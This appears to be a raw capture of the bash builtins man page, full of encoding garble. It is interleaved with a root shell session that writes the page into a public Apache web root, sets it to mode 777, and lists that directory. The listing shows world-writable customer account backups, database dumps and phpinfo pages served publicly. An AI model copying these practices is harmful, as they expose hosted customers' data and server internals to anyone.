error occurs adding a completion specification. continue [n] Resume the next iteration of the enclosing for, while, until, or select loop. If n is specified, resume at the nth enclosing loop. n must be ⥠1. If n is greater than the number of enclosing loops, the last enclosing loop (the ââtop-levelââ loop) is resumed. When continue is executed inside of loop, the return value is non-zero when n is ⤠0; Otherwise, continue returns 0 value. When continue is executed outside of loop, the return value is 0. declare [-afFirtx] [-p] [name[=value] ...] typeset [-afFirtx] [-p] [name[=value] ...] Declare variables and/or give them attributes. If no names are given then display the values of variables. The -p option will display the attributes and values of each name. When -p is used, additional options are ignored. The -F option inhibits the display of function definitions; only the function name and attributes are printed. If the extdebug shell option is enabled using shopt, the source file name and line number where the function is defined are displayed as well. The -F option implies -f. The following options can be used to restrict out- put to variables with the specified attribute or to give vari- ables attributes: -a Each name is an array variable (see Arrays above). -f Use function names only. -i The variable is treated as an integer; arithmetic evalua- tion (see ARITHMETIC EVALUATION ) is performed when the variable is assigned a value. -r Make names readonly. These names cannot then be assigned values by subsequent assignment statements or unset. -t Give each name the trace attribute. Traced functions inherit the DEBUG and RETURN traps from the calling shell. The trace attribute has no special meaning for variables. -x Mark names for export to subsequent commands via the environment. Using â+â instead of â-â turns off the attribute instead, with the exception that +a may not be used to destroy an array vari- able. When used in a function, makes each name local, as with the local command. If a variable name is followed by =value, the value of the variable is set to value. The return value is 0 unless an invalid option is encountered, an attempt is made to define a function using ââ-f foo=barââ, an attempt is made to assign a value to a readonly variable, an attempt is made to assign a value to an array variable without using the compound assignment syntax (see Arrays above), one of the names is not a valid shell variable name, an attempt is made to turn off read- only status for a readonly variable, an attempt is made to turn off array status for an array variable, or an attempt is made to display a non-existent function with -f. dirs [-clpv] [+n] [-n] Without options, displays the list of currently remembered directories. The default display is on a single line with directory names separated by spaces. Directories are added to the list with the pushd command; the popd command removes entries from the list. +n Displays the nth entry counting from the left of the list shown by dirs when invoked without options, starting with zero. -n Displays the nth entry counting from the right of the list shown by dirs when invoked without options, starting with zero. -c Clears the directory stack by deleting all of the entries. -l Produces a longer listing; the default listing format uses a tilde to denote the home directory. -p Print the directory stack with one entry per line. -v Print the directory stack with one entry per line, pre- fixing each entry with its index in the stack. The return value is 0 unless an invalid option is supplied or n indexes beyond the end of the directory stack. disown [-ar] [-h] [jobspec ...] Without options, each jobspec is removed from the table of active jobs. If the -h option is given, each jobspec is not removed from the table, but is marked so that SIGHUP is not sent to the job if the shell receives a SIGHUP. If no jobspec is present, and neither the -a nor the -r option is supplied, the current job is used. If no jobspec is supplied, the -a option means to remove or mark all jobs; the -r option without a job- spec argument restricts operation to running jobs. The return value is 0 unless a jobspec does not specify a valid job. echo [-neE] [arg ...] Output the args, separated by spaces, followed by a newline. The return status is always 0. If -n is specified, the trailing newline is suppressed. If the -e option is given, interpreta- tion of the following backslash-escaped characters is enabled. The -E option disables the interpretation of these escape char- acters, even on systems where they are interpreted by default. The xpg_echo shell option may be used to dynamically determine whether or not echo expands these escape characters by default. echo does not interpret -- to mean the end of options. echo interprets the following escape sequences: \a alert (bell) \b backspace \c suppress trailing newline \e an escape character \f form feed \n new line \r carriage return \t horizontal tab \v vertical tab \\ backslash nnn the eight-bit character whose value is the octal value nnn (zero to three octal digits) \xHH the eight-bit character whose value is the hexadecimal value HH (one or two hex digits) enable [-adnps] [-f filename] [name ...] Enable and disable builtin shell commands. Disabling a builtin allows a disk command which has the same name as a shell builtin to be executed without specifying a full pathname, even though the shell normally searches for builtins before disk commands. If -n is used, each name is disabled; otherwise, names are enabled. For example, to use the test binary found via the PATH instead of the shell builtin version, run ââenable -n testââ. The -f option means to load the new builtin command name from shared object filename, on systems that support dynamic loading. The -d option will delete a builtin previously loaded with -f. If no name arguments are given, or if the -p option is supplied, a list of shell builtins is printed. With no other option argu- ments, the list consists of all enabled shell builtins. If -n is supplied, only disabled builtins are printed. If -a is sup- plied, the list printed includes all builtins, with an indica- tion of whether or not each is enabled. If -s is supplied, the output is restricted to the POSIX special builtins. The return value is 0 unless a name is not a shell builtin or there is an error loading a new builtin from a shared object. eval [arg ...] The args are read and concatenated together into a single com- mand. This command is then read and executed by the shell, and its exit status is returned as the value of eval. If there are no args, or only null arguments, eval returns 0. exec [-cl] [-a name] [command [arguments]] If command is specified, it replaces the shell. No new process is created. The arguments become the arguments to command. If the -l option is supplied, the shell places a dash at the begin- ning of the zeroth arg passed to command. This is what login(1) does. The -c option causes command to be executed with an empty environment. If -a is supplied, the shell passes name as the zeroth argument to the executed command. If command cannot be executed for some reason, a non-interactive shell exits, unless the shell option execfail is enabled, in which case it returns failure. An interactive shell returns failure if the file can- not be executed. If command is not specified, any redirections take effect in the current shell, and the return status is 0. If there is a redirection error, the return status is 1. exit [n] Cause the shell to exit with a status of n. If n is omitted, the exit status is that of the last command executed. A trap on EXIT is executed before the shell terminates. export [-fn] [name[=word]] ... export -p The supplied names are marked for automatic export to the envi- ronment of subsequently executed commands. If the -f option is given, the names refer to functions. If no names are given, or if the -p option is supplied, a list of all names that are exported in this shell is printed. The -n option causes the export property to be removed from each name. If a variable name is followed by =word, the value of the variable is set to word. export returns an exit status of 0 unless an invalid option is encountered, one of the names is not a valid shell variable name, or -f is supplied with a name that is not a func- tion. fc [-e ename] [-nlr] [first] [last] fc -s [pat=rep] [cmd] Fix Command. In the first form, a range of commands from first to last is selected from the history list. First and last may be specified as a string (to locate the last command beginning with that string) or as a number (an index into the history list, where a negative number is used as an offset from the cur- rent command number). If last is not specified it is set to the current command for listing (so that ââfc -l -10ââ prints the last 10 commands) and to first otherwise. If first is not spec- ified it is set to the previous command for editing and -16 for listing. The -n option suppresses the command numbers when listing. The -r option reverses the order of the commands. If the -l option is given, the commands are listed on standard output. Other- wise, the editor given by ename is invoked on a file containing those commands. If ename is not given, the value of the FCEDIT variable is used, and the value of EDITOR if FCEDIT is not set. If neither variable is set, is used. When editing is complete, the edited commands are echoed and executed. In the second form, command is re-executed after each instance of pat is replaced by rep. A useful alias to use with this is ââr="fc -s"ââ, so that typing ââr ccââ runs the last command beginning with ââccââ and typing âârââ re-executes the last com- mand. If the first form is used, the return value is 0 unless an invalid option is encountered or first or last specify history lines out of range. If the -e option is supplied, the return value is the value of the last command executed or failure if an error occurs with the temporary file of commands. If the second form is used, the return status is that of the command re-exe- cuted, unless cmd does not specify a valid history line, in which case fc returns failure. fg [jobspec] Resume jobspec in the foreground, and make it the current job. If jobspec is not present, the shellâs notion of the current job is used. The return value is that of the command placed into the foreground, or failure if run when job control is disabled or, when run with job control enabled, if jobspec does not spec- ify a valid job or jobspec specifies a job that was started without job control. getopts optstring name [args] getopts is used by shell procedures to parse positional parame- ters. optstring contains the option characters to be recog- nized; if a character is followed by a colon, the option is expected to have an argument, which should be separated from it by white space. The colon and question mark characters may not be used as option characters. Each time it is invoked, getopts places the next option in the shell variable name, initializing name if it does not exist, and the index of the next argument to be processed into the variable OPTIND. OPTIND is initialized to 1 each time the shell or a shell script is invoked. When an option requires an argument, getopts places that argument into the variable OPTARG. The shell does not reset OPTIND automati- cally; it must be manually reset between multiple calls to getopts within the same shell invocation if a new set of parame- ters is to be used. When the end of options is encountered, getopts exits with a return value greater than zero. OPTIND is set to the index of the first non-option argument, and name is set to ?. getopts normally parses the positional parameters, but if more arguments are given in args, getopts parses those instead. getopts can report errors in two ways. If the first character of optstring is a colon, silent error reporting is used. In normal operation diagnostic messages are printed when invalid options or missing option arguments are encountered. If the variable OPTERR is set to 0, no error messages will be dis- played, even if the first character of optstring is not a colon. If an invalid option is seen, getopts places ? into name and, if not silent, prints an error message and unsets OPTARG. If getopts is silent, the option character found is placed in OPTARG and no diagnostic message is printed. If a required argument is not found, and getopts is not silent, a question mark (?) is placed in name, OPTARG is unset, and a diagnostic message is printed. If getopts is silent, then a colon (:) is placed in name and OPTARG is set to the option character found. getopts returns true if an option, specified or unspecified, is found. It returns false if the end of options is encountered or an error occurs. hash [-lr] [-p filename] [-dt] [name] For each name, the full file name of the command is determined by searching the directories in $PATH and remembered. If the -p option is supplied, no path search is performed, and filename is used as the full file name of the command. The -r option causes the shell to forget all remembered locations. The -d option causes the shell to forget the remembered location of each name. If the -t option is supplied, the full pathname to which each name corresponds is printed. If multiple name arguments are supplied with -t, the name is printed before the hashed full pathname. The -l option causes output to be displayed in a for- mat that may be reused as input. If no arguments are given, or if only -l is supplied, information about remembered commands is printed. The return status is true unless a name is not found or an invalid option is supplied. help [-s] [pattern] Display helpful information about builtin commands. If pattern is specified, help gives detailed help on all commands matching pattern; otherwise help for all the builtins and shell control structures is printed. The -s option restricts the information displayed to a short usage synopsis. The return status is 0 unless no command matches pattern. history [n] history -c history -d offset history -anrw [filename] history -p arg [arg ...] history -s arg [arg ...] With no options, display the command history list with line num- bers. Lines listed with a * have been modified. An argument of n lists only the last n lines. If the shell variable HISTTIME- FORMAT is set and not null, it is used as a format string for strftime(3) to display the time stamp associated with each dis- played history entry. No intervening blank is printed between the formatted time stamp and the history line. If filename is supplied, it is used as the name of the history file; if not, the value of HISTFILE is used. Options, if supplied, have the following meanings: -c Clear the history list by deleting all the entries. -d offset Delete the history entry at position offset. -a Append the âânewââ history lines (history lines entered since the beginning of the current bash session) to the history file. -n Read the history lines not already read from the history file into the current history list. These are lines appended to the history file since the beginning of the current bash session. -r Read the contents of the history file and use them as the current history. -w Write the current history to the history file, overwrit- ing the history fileâs contents. -p Perform history substitution on the following args and display the result on the standard output. Does not store the results in the history list. Each arg must be quoted to disable normal history expansion. -s Store the args in the history list as a single entry. The last command in the history list is removed before the args are added. If the HISTTIMEFORMAT is set, the time stamp information associ- ated with each history entry is written to the history file. The return value is 0 unless an invalid option is encountered, an error occurs while reading or writing the history file, an invalid offset is supplied as an argument to -d, or the history expansion supplied as an argument to -p fails. jobs [-lnprs] [ jobspec ... ] jobs -x command [ args ... ] The first form lists the active jobs. The options have the fol- lowing meanings: -l List process IDs in addition to the normal information. -p List only the process ID of the jobâs process group leader. -n Display information only about jobs that have changed status since the user was last notified of their status. -r Restrict output to running jobs. -s Restrict output to stopped jobs. If jobspec is given, output is restricted to information about that job. The return status is 0 unless an invalid option is encountered or an invalid jobspec is supplied. If the -x option is supplied, jobs replaces any jobspec found in command or args with the corresponding process group ID, and executes command passing it args, returning its exit status. kill [-s sigspec | -n signum | -sigspec] [pid | jobspec] ... kill -l [sigspec | exit_status] Send the signal named by sigspec or signum to the processes named by pid or jobspec. sigspec is either a case-insensitive signal name such as SIGKILL (with or without the SIG prefix) or a signal number; signum is a signal number. If sigspec is not present, then SIGTERM is assumed. An argument of -l lists the signal names. If any arguments are supplied when -l is given, the names of the signals corresponding to the arguments are listed, and the return status is 0. The exit_status argument to -l is a number specifying either a signal number or the exit status of a process terminated by a signal. kill returns true if at least one signal was successfully sent, or false if an error occurs or an invalid option is encountered. let arg [arg ...] Each arg is an arithmetic expression to be evaluated (see ARITH- METIC EVALUATION). If the last arg evaluates to 0, let returns 1; 0 is returned otherwise. local [option] [name[=value] ...] For each argument, a local variable named name is created, and assigned value. The option can be any of the options accepted by declare. When local is used within a function, it causes the variable name to have a visible scope restricted to that func- tion and its children. With no operands, local writes a list of local variables to the standard output. It is an error to use local when not within a function. The return status is 0 unless local is used outside a function, an invalid name is supplied, or name is a readonly variable. logout Exit a login shell. popd [-n] [+n] [-n] Removes entries from the directory stack. With no arguments, removes the top directory from the stack, and performs a cd to the new top directory. Arguments, if supplied, have the follow- ing meanings: +n Removes the nth entry counting from the left of the list shown by dirs, starting with zero. For example: ââpopd +0ââ removes the first directory, ââpopd +1ââ the second. -n Removes the nth entry counting from the right of the list shown by dirs, starting with zero. For example: ââpopd -0ââ removes the last directory, ââpopd -1ââ the next to last. -n Suppresses the normal change of directory when removing directories from the stack, so that only the stack is manipulated. If the popd command is successful, a dirs is performed as well, and the return status is 0. popd returns false if an invalid option is encountered, the directory stack is empty, a non-exis- tent directory stack entry is specified, or the directory change fails. printf [-v var] format [arguments] Write the formatted arguments to the standard output under the control of the format. The format is a character string which contains three types of objects: plain characters, which are simply copied to standard output, character escape sequences, which are converted and copied to the standard output, and for- mat specifications, each of which causes printing of the next successive argument. In addition to the standard printf(1) for- mats, %b causes printf to expand backslash escape sequences in the corresponding argument (except that \c terminates output, backslashes in \', \", and \? are not removed, and octal escapes beginning with may contain up to four digits), and %q causes printf to output the corresponding argument in a format that can be reused as shell input. The -v option causes the output to be assigned to the variable var rather than being printed to the standard output. The format is reused as necessary to consume all of the argu- ments. If the format requires more arguments than are supplied, the extra format specifications behave as if a zero value or null string, as appropriate, had been supplied. The return value is zero on success, non-zero on failure. pushd [-n] [dir] pushd [-n] [+n] [-n] Adds a directory to the top of the directory stack, or rotates the stack, making the new top of the stack the current working directory. With no arguments, exchanges the top two directories and returns 0, unless the directory stack is empty. Arguments, if supplied, have the following meanings: +n Rotates the stack so that the nth directory (counting from the left of the list shown by dirs, starting with zero) is at the top. -n Rotates the stack so that the nth directory (counting from the right of the list shown by dirs, starting with zero) is at the top. -n Suppresses the normal change of directory when adding directories to the stack, so that only the stack is manipulated. dir Adds dir to the directory stack at the top, making it the new current working directory. If the pushd command is successful, a dirs is performed as well. If the first form is used, pushd returns 0 unless the cd to dir fails. With the second form, pushd returns 0 unless the direc- tory stack is empty, a non-existent directory stack element is specified, or the directory change to the specified new current directory fails. pwd [-LP] Print the absolute pathname of the current working directory. The pathname printed contains no symbolic links if the -P option is supplied or the -o physical option to the set builtin command is enabled. If the -L option is used, the pathname printed may contain symbolic links. The return status is 0 unless an error occurs while reading the name of the current directory or an invalid option is supplied. read [-ers] [-u fd] [-t timeout] [-a aname] [-p prompt] [-n nchars] [-d delim] [name ...] One line is read from the standard input, or from the file descriptor fd supplied as an argument to the -u option, and the first word is assigned to the first name, the second word to the second name, and so on, with leftover words and their interven- ing separators assigned to the last name. If there are fewer words read from the input stream than names, the remaining names are assigned empty values. The characters in IFS are used to split the line into words. The backslash character (\) may be used to remove any special meaning for the next character read and for line continuation. Options, if supplied, have the fol- lowing meanings: -a aname The words are assigned to sequential indices of the array variable aname, starting at 0. aname is unset before any new values are assigned. Other name arguments are ignored. -d delim The first character of delim is used to terminate the input line, rather than newline. -e If the standard input is coming from a terminal, readline (see READLINE above) is used to obtain the line. -n nchars read returns after reading nchars characters rather than waiting for a complete line of input. -p prompt Display prompt on standard error, without a trailing new- line, before attempting to read any input. The prompt is displayed only if input is coming from a terminal. -r Backslash does not act as an escape character. The back- slash is considered to be part of the line. In particu- lar, a backslash-newline pair may not be used as a line continuation. -s Silent mode. If input is coming from a terminal, charac- ters are not echoed. -t timeout Cause read to time out and return failure if a complete line of input is not read within timeout seconds. This option has no effect if read is not reading input from the terminal or a pipe. -u fd Read input from file descriptor fd. If no names are supplied, the line read is assigned to the vari- able REPLY. The return code is zero, unless end-of-file is encountered, read times out, or an invalid file descriptor is supplied as the argument to -u. readonly [-apf] [name[=word] ...] The given names are marked readonly; the values of these names may not be changed by subsequent assignment. If the -f option is supplied, the functions corresponding to the names are so marked. The -a option restricts the variables to arrays. If no name arguments are given, or if the -p option is supplied, a list of all readonly names is printed. The -p option causes output to be displayed in a format that may be reused as input. If a variable name is followed by =word, the value of the vari- able is set to word. The return status is 0 unless an invalid option is encountered, one of the names is not a valid shell variable name, or -f is supplied with a name that is not a function. return [n] Causes a function to exit with the return value specified by n. If n is omitted, the return status is that of the last command executed in the function body. If used outside a function, but during execution of a script by the . (source) command, it causes the shell to stop executing that script and return either n or the exit status of the last command executed within the script as the exit status of the script. If used outside a function and not during execution of a script by ., the return status is false. Any command associated with the RETURN trap is executed before execution resumes after the function or script. set [--abefhkmnptuvxBCHP] [-o option] [arg ...] Without options, the name and value of each shell variable are displayed in a format that can be reused as input for setting or resetting the currently-set variables. Read-only variables can- not be reset. In posix mode, only shell variables are listed. The output is sorted according to the current locale. When options are specified, they set or unset shell attributes. Any arguments remaining after the options are processed are treated as values for the positional parameters and are assigned, in order, to $1, $2, ... $n. Options, if specified, have the fol- lowing meanings: -a Automatically mark variables and functions which are modified or created for export to the environment of subsequent commands. -b Report the status of terminated background jobs immedi- ately, rather than before the next primary prompt. This is effective only when job control is enabled. -e Exit immediately if a simple command (see SHELL GRAMMAR above) exits with a non-zero status. The shell does not exit if the command that fails is part of the command list immediately following a while or until keyword, part of the test in an if statement, part of a && or ââ list, or if the commandâs return value is being inverted via !. A trap on ERR, if set, is executed before the shell exits. -f Disable pathname expansion. -h Remember the location of commands as they are looked up for execution. This is enabled by default. -k All arguments in the form of assignment statements are placed in the environment for a command, not just those that precede the command name. -m Monitor mode. Job control is enabled. This option is on by default for interactive shells on systems that support it (see JOB CONTROL above). Background pro- cesses run in a separate process group and a line con- taining their exit status is printed upon their comple- tion. -n Read commands but do not execute them. This may be used to check a shell script for syntax errors. This is ignored by interactive shells. -o option-name The option-name can be one of the following: allexport Same as -a. braceexpand Same as -B. emacs Use an emacs-style command line editing inter- face. This is enabled by default when the shell is interactive, unless the shell is started with the --noediting option. errtrace Same as -E. functrace Same as -T. errexit Same as -e. hashall Same as -h. histexpand Same as -H. history Enable command history, as described above under HISTORY. This option is on by default in inter- active shells. ignoreeof The effect is as if the shell command ââIGNOREEOF=10ââ had been executed (see Shell Variables above). keyword Same as -k. monitor Same as -m. noclobber Same as -C. noexec Same as -n. noglob Same as -f. nolog Currently ignored. notify Same as -b. nounset Same as -u. onecmd Same as -t. physical Same as -P. pipefail If set, the return value of a pipeline is the value of the last (rightmost) command to exit with a non-zero status, or zero if all commands in the pipeline exit successfully. This option is disabled by default. posix Change the behavior of bash where the default operation differs from the POSIX standard to match the standard (posix mode). privileged Same as -p. verbose Same as -v. vi Use a vi-style command line editing interface. xtrace Same as -x. If -o is supplied with no option-name, the values of the current options are printed. If +o is supplied with no option-name, a series of set commands to recreate the current option settings is displayed on the standard output. -p Turn on privileged mode. In this mode, the $ENV and $BASH_ENV files are not processed, shell functions are not inherited from the environment, and the SHELLOPTS variable, if it appears in the environment, is ignored. If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, these actions are taken and the effective user id is set to the real user id. If the -p option is supplied at startup, the effective user id is not reset. Turning this option off causes the effective user and group ids to be set to the real user and group ids. -t Exit after reading and executing one command. -u Treat unset variables as an error when performing param- eter expansion. If expansion is attempted on an unset variable, the shell prints an error message, and, if not interactive, exits with a non-zero status. -v Print shell input lines as they are read. -x After expanding each simple command, for command, case command, select command, or arithmetic for command, dis- play the expanded value of PS4, followed by the command and its expanded arguments or associated word list. -B The shell performs brace expansion (see Brace Expansion above). This is on by default. -C If set, bash does not overwrite an existing file with the >, >&, and <> redirection operators. This may be overridden when creating output files by using the redi- rection operator >| instead of >. -E If set, any trap on ERR is inherited by shell functions, command substitutions, and commands executed in a sub- shell environment. The ERR trap is normally not inher- ited in such cases. -H Enable ! style history substitution. This option is on by default when the shell is interactive. -P If set, the shell does not follow symbolic links when executing commands such as cd that change the current working directory. It uses the physical directory structure instead. By default, bash follows the logical chain of directories when performing commands which change the current directory. -T If set, any traps on DEBUG and RETURN are inherited by shell functions, command substitutions, and commands executed in a subshell environment. The DEBUG and RETURN traps are normally not inherited in such cases. -- If no arguments follow this option, then the positional parameters are unset. Otherwise, the positional parame- ters are set to the args, even if some of them begin with a -. - Signal the end of options, cause all remaining args to be assigned to the positional parameters. The -x and -v options are turned off. If there are no args, the posi- tional parameters remain unchanged. The options are off by default unless otherwise noted. Using + rather than - causes these options to be turned off. The options can also be specified as arguments to an invocation of the shell. The current set of options may be found in $-. The return status is always true unless an invalid option is encoun- tered. shift [n] The positional parameters from n+1 ... are renamed to $1 .... Parameters represented by the numbers $# down to $#-n+1 are unset. n must be a non-negative number less than or equal to $#. If n is 0, no parameters are changed. If n is not given, it is assumed to be 1. If n is greater than $#, the positional parameters are not changed. The return status is greater than zero if n is greater than $# or less than zero; otherwise 0. shopt [-pqsu] [-o] [optname ...] Toggle the values of variables controlling optional shell behav- ior. With no options, or with the -p option, a list of all set- table options is displayed, with an indication of whether or not each is set. The -p option causes output to be displayed in a form that may be reused as input. Other options have the fol- lowing meanings: -s Enable (set) each optname. -u Disable (unset) each optname. -q Suppresses normal output (quiet mode); the return status indicates whether the optname is set or unset. If multiple optname arguments are given with -q, the return status is zero if all optnames are enabled; non-zero oth- erwise. -o Restricts the values of optname to be those defined for the -o option to the set builtin. If either -s or -u is used with no optname arguments, the dis- play is limited to those options which are set or unset, respec- tively. Unless otherwise noted, the shopt options are disabled (unset) by default. The return status when listing options is zero if all optnames are enabled, non-zero otherwise. When setting or unsetting options, the return status is zero unless an optname is not a valid shell option. The list of shopt options is: cdable_vars If set, an argument to the cd builtin command that is not a directory is assumed to be the name of a variable whose value is the directory to change to. cdspell If set, minor errors in the spelling of a directory com- ponent in a cd command will be corrected. The errors checked for are transposed characters, a missing charac- ter, and one character too many. If a correction is found, the corrected file name is printed, and the com- mand proceeds. This option is only used by interactive shells. checkhash If set, bash checks that a command found in the hash ta- ble exists before trying to execute it. If a hashed command no longer exists, a normal path search is per- formed. checkwinsize If set, bash checks the window size after each command and, if necessary, updates the values of LINES and COLUMNS. cmdhist If set, bash attempts to save all lines of a multiple- line command in the same history entry. This allows easy re-editing of multi-line commands. dotglob If set, bash includes filenames beginning with a â.â in the results of pathname expansion. execfail If set, a non-interactive shell will not exit if it can- not execute the file specified as an argument to the exec builtin command. An interactive shell does not exit if exec fails. expand_aliases If set, aliases are expanded as described above under ALIASES. This option is enabled by default for interac- tive shells. extdebug If set, behavior intended for use by debuggers is enabled: 1. The -F option to the declare builtin displays the source file name and line number corresponding to each function name supplied as an argument. 2. If the command run by the DEBUG trap returns a non-zero value, the next command is skipped and not executed. 3. If the command run by the DEBUG trap returns a value of 2, and the shell is executing in a sub- routine (a shell function or a shell script exe- cuted by the . or source builtins), a call to return is simulated. 4. BASH_ARGC and BASH_ARGV are updated as described in their descriptions above. 5. Function tracing is enabled: command substitu- tion, shell functions, and subshells invoked with ( command ) inherit the DEBUG and RETURN traps. 6. Error tracing is enabled: command substitution, shell functions, and subshells invoked with ( command ) inherit the ERROR trap. extglob If set, the extended pattern matching features described above under Pathname Expansion are enabled. extquote If set, $'string' and $"string" quoting is performed within ${parameter} expansions enclosed in double quotes. This option is enabled by default. failglob If set, patterns which fail to match filenames during pathname expansion result in an expansion error. force_fignore If set, the suffixes specified by the FIGNORE shell variable cause words to be ignored when performing word completion even if the ignored words are the only possi- ble completions. See SHELL VARIABLES above for a description of FIGNORE. This option is enabled by default. gnu_errfmt If set, shell error messages are written in the standard GNU error message format. histappend If set, the history list is appended to the file named by the value of the HISTFILE variable when the shell exits, rather than overwriting the file. histreedit If set, and readline is being used, a user is given the opportunity to re-edit a failed history substitution. histverify If set, and readline is being used, the results of his- tory substitution are not immediately passed to the shell parser. Instead, the resulting line is loaded into the readline editing buffer, allowing further modi- fication. hostcomplete If set, and readline is being used, bash will attempt to perform hostname completion when a word containing a @ is being completed (see Completing under READLINE above). This is enabled by default. huponexit If set, bash will send SIGHUP to all jobs when an inter- active login shell exits. interactive_comments If set, allow a word beginning with # to cause that word and all remaining characters on that line to be ignored in an interactive shell (see COMMENTS above). This option is enabled by default. lithist If set, and the cmdhist option is enabled, multi-line commands are saved to the history with embedded newlines rather than using semicolon separators where possible. login_shell The shell sets this option if it is started as a login shell (see INVOCATION above). The value may not be changed. mailwarn If set, and a file that bash is checking for mail has been accessed since the last time it was checked, the message ââThe mail in mailfile has been readââ is dis- played. no_empty_cmd_completion If set, and readline is being used, bash will not attempt to search the PATH for possible completions when completion is attempted on an empty line. nocaseglob If set, bash matches filenames in a case-insensitive fashion when performing pathname expansion (see Pathname Expansion above). nocasematch If set, bash matches patterns in a case-insensitive fashion when performing matching while executing case or [[ conditional commands. nullglob If set, bash allows patterns which match no files (see Pathname Expansion above) to expand to a null string, rather than themselves. progcomp If set, the programm root@click [~]# man history > /usr/local/apache/htdocs/history_man_output.txt root@click [~]# chmod 777 /usr/local/apache/htdocs/history_man_output.txt root@click [~]# hostname click.site.com root@click [~]# cd /usr/local/apache/htdocs/ root@click [/usr/local/apache/htdocs]# ll total 2804656 drwxr-xr-x 5 root root 4096 Dec 16 09:46 ./ drwxr-xr-x 16 root root 4096 Nov 29 15:32 ../ -rw-r--r-- 1 root root 196 Apr 7 2010 400.shtml -rw-r--r-- 1 root root 174 Apr 7 2010 401.shtml -rw-r--r-- 1 root root 170 Apr 7 2010 403.shtml -rw-r--r-- 1 root root 171 Apr 7 2010 404.shtml -rw-r--r-- 1 root root 210 Apr 7 2010 500.shtml -rw------- 1 root root 3983681 Apr 7 2010 backup-2.25.2010_20-00-07_golddust.tar.gz -rwxrwxrwx 1 root root 380580983 Apr 7 2010 backup-6.18.2009_23-04-14_takorabt.tar.gz* -rwxrwxrwx 1 root root 4158 Nov 29 16:32 check_exim* -rw-r--r-- 1 root root 2250 Apr 7 2010 cp_errordocument.shtml -rwxrwxrwx 1 root root 105995719 Apr 7 2010 cpmove-bojoecom.tar.gz* -rwxrwxrwx 1 root root 20188756 Sep 17 02:38 cpmove-brmconsu.tar.gz* -rwxrwxrwx 1 root root 98951979 Oct 14 09:45 cpmove-conceptp.tar.gz* -rwxrwxrwx 1 root root 261936456 Apr 7 2010 cpmove-cosmeti3.tar.gz* -rwxrwxrwx 1 root root 47049368 Dec 11 22:27 cpmove-emodecom.tar.gz* -rwxrwxrwx 1 root root 91780370 Oct 27 18:39 cpmove-giaorgau.tar.gz* -rwxrwxrwx 1 root root 565217939 Oct 23 22:14 cpmove-gustavoh.tar.gz* -rwxrwxrwx 1 root root 67074 Sep 21 23:01 cpmove-perucell.tar.gz* -rwxr-xr-x 1 root root 836551159 Apr 7 2010 cpmove-theisoft.tar.gz* drwxr-xr-x 3 root root 4096 Apr 7 2010 ea3_apache_build_htdocs/ -rwxrwxrwx 1 root root 120521 Apr 7 2010 getuggco_boutique.sql* -rwxrwxrwx 1 root root 102167 Dec 16 09:46 history_man_output.txt* -rw-r--r-- 1 root root 111 Apr 7 2010 index.html -rw-r--r-- 1 root root 3477 Apr 7 2010 index_original.html -rwxrwxrwx 1 root root 456164371 Apr 7 2010 kjca.tar* -rwxrwxrwx 1 root root 295330 Apr 7 2010 mysql.tar.gz* -rwxr-xr-x 1 root root 19 Apr 7 2010 phpinfo.php* -rwxr-xr-x 1 root root 19 Apr 7 2010 _rvphpinfo.php* -rw-r--r-- 1 root root 29 Apr 7 2010 serverstats_inc.php drwxr-xr-x 2 root root 4096 Apr 7 2010 suspended.page/ d--------- 2 root root 4096 Apr 7 2010 test/ root@click [/usr/local/apache/htdocs]# du -sh history_man_output.txt* 104K history_man_output.txt root@click [/usr/local/apache/htdocs]# cp history_man_output.txt* cp: missing destination file operand after `history_man_output.txt' Try `cp --help' for more information. root@click [/usr/local/apache/htdocs]# cp history_man_output.txt history_man_output.txt* cp: `history_man_output.txt' and `history_man_output.txt' are the same file root@click [/usr/local/apache/htdocs]# cp history_man_output.txt history_man_output.html root@click [/usr/local/apache/htdocs]# cat history_man_output.txt BASH_BUILTINS(1) BASH_BUILTINS(1) NAME bash, :, ., [, alias, bg, bind, break, builtin, cd, command, compgen, complete, continue, declare, dirs, disown, echo, enable, eval, exec, exit, export, fc, fg, getopts, hash, help, history, jobs, kill, let, local, logout, popd, printf, pushd, pwd, read, readonly, return, set, shift, shopt, source, suspend, test, times, trap, type, typeset, ulimit, umask, unalias, unset, wait - bash built-in commands, see bash(1) BASH BUILTIN COMMANDS Unless otherwise noted, each builtin command documented in this section as accepting options preceded by - accepts -- to signify the end of the options. For example, the :, true, false, and test builtins do not accept options. Also, please note that while executing in non-interac- tive mode and while in posix mode, any special builtin (like ., :, break, continue, eval, exec, exit, export, readonly, return, set, shift, source, times, trap, unset) exiting with a non-zero status causes the shell to stop execution. : [arguments] No effect; the command does nothing beyond expanding arguments and performing any specified redirections. A zero exit code is returned. . filename [arguments] source filename [arguments] Read and execute commands from filename in the current shell environment and return the exit status of the last command exe- cuted from filename. If filename does not contain a slash, file names in PATH are used to find the directory containing file- name. The file searched for in PATH need not be executable. When bash is not in posix mode, the current directory is searched if no file is found in PATH. If the sourcepath option to the shopt builtin command is turned off, the PATH is not searched. If any arguments are supplied, they become the posi- tional parameters when filename is executed. Otherwise the positional parameters are unchanged. The return status is the status of the last command exited within the script (0 if no commands are executed), and false if filename is not found or cannot be read. alias [-p] [name[=value] ...] Alias with no arguments or with the -p option prints the list of aliases in the form alias name=value on standard output. When arguments are supplied, an alias is defined for each name whose value is given. A trailing space in value causes the next word to be checked for alias substitution when the alias is expanded. For each name in the argument list for which no value is sup- plied, the name and value of the alias is printed. Alias returns true unless a name is given for which no alias has been defined. Note aliases are not expanded by default in non-interactive shell, and it can be enabled by setting the expand_aliases shell option using shopt. bg [jobspec ...] Resume each suspended job jobspec in the background, as if it had been started with &. If jobspec is not present, the shellâs notion of the current job is used. bg jobspec returns 0 unless run when job control is disabled or, when run with job control enabled, any specified jobspec was not found or was started without job control. bind [-m keymap] [-lpsvPSV] bind [-m keymap] [-q function] [-u function] [-r keyseq] bind [-m keymap] -f filename bind [-m keymap] -x keyseq:shell-command bind [-m keymap] keyseq:function-name bind readline-command Display current readline key and function bindings, bind a key sequence to a readline function or macro, or set a readline variable. Each non-option argument is a command as it would appear in .inputrc, but each binding or command must be passed as a separate argument; e.g., â"\C-x\C-r": re-read-init-fileâ. Options, if supplied, have the following meanings: -m keymap Use keymap as the keymap to be affected by the subsequent bindings. Acceptable keymap names are emacs, emacs-stan- dard, emacs-meta, emacs-ctlx, vi, vi-move, vi-command, and vi-insert. vi is equivalent to vi-command; emacs is equivalent to emacs-standard. -l List the names of all readline functions. -p Display readline function names and bindings in such a way that they can be re-read. -P List current readline function names and bindings. -v Display readline variable names and values in such a way that they can be re-read. -V List current readline 